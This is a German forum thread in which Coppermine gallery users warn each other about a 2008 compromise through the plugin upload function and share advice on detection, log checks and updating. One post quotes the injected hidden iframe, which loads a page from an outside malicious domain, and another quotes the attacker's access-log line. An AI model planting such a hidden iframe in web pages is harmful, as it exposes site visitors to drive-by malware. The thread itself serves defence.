|
Coppermine-Gallery gehackt? Schaut lieber mal nach...
Hiho,
heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still :evil:) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen. Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch :shock:) ein Iframe an den Anfang gesetzt. Code:
<iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe>Siehe dazu auch den Thread im Coppermine-Forum. http://forum.coppermine-gallery.net/...c,51671.0.html Also, Leute die Coppermine haben sollten mal schauen... Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist :roll: Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde! http://forum.coppermine-gallery.net/...c,51787.0.html Viele Grüße Andreas |
Hallo Andreas,
vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen. Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde. Lg. Josef |
Hallo Josef,
im Quellcode der generierten Seite schauen, ob da irgendwo ein ominöses Iframe auftaucht. Bei mir (und den anderen wohl auch) ist folgendes passiert: Heute Nacht ein Angriff, bei dem über eine Lücke im Upload-Teil der CPG eine Datei ins Plugin-Verzeichnis geladen wurde. (es gab auch Fälle in denen php-Dateien als zip/jpg ins Album Verzeichnis gepackt wurden) Code:
91.78.72.131 - - [13/Apr/2008:16:19:45 +0200] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 24245 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"Logs durchstöbern und nach der upload-Funktion suchen hat bei mir den Zugriff gezeigt. |
Da bei mir auch Coppermine läuft, welche Version hast du?
|
Ich hatte die 1.4.16, also die bis dato neuste.
Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten ;) |
ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen
|
Na ja Black,
besser jetzt, als wenn es zu spät ist :? Bei mir hatte der Schadenscode zum Glück nur drei PHP-Dateien verändert, was man so liest, sind mitunter ganze Webserver betroffen und in allen PHP/HTML-Dateien steht dieser Ifram-Mist. Viel Spaß :D |
Danke für die Info, ich hab nun einfach mal ne alte, brachliegende Coppermine Galerie die ich noch auf ner subdomain hatte entsorgt. Was es nicht gibt braucht nicht gepflegt und geupdated zu werden, kann dafür aber auch nicht gehackt werden. ;) :top:
|
Heute wurde noch einmal eine Bugfix-Version 1.4.18 nachgelegt. Ich muss gestehen, dass ich mit dem Aktualisieren etwas nachlässig war und noch bis heute 1.4.14 verwendet habe. Werde jetzt aber regelmäßig updaten ...
Lg. Josef |
1.4.18 habe ich heute über die 1.4.16 drübergebügelt. Läuft ohne Probleme :top:
See ya, Maic. |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 23:29 Uhr. |